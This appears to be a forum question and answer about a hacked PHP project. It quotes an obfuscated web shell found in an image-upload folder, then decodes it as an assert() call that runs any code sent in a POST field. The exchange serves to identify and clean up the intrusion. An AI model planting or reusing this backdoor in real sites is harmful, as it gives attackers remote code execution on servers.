Recently i found out my project got hacked and i found a script in my images folder which where a directory for user to upload their images (using file input). Here is the script that i found in the directory.
errot_db.php
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
This code hides the following statement:
@assert ($_POST[025]);
Which means it'll execute the PHP code send in the POST variable "025". So, yes, this is indeed a backdoor! I recommend asking on security.stackexchange.com for help on how to properly deal with the fallout.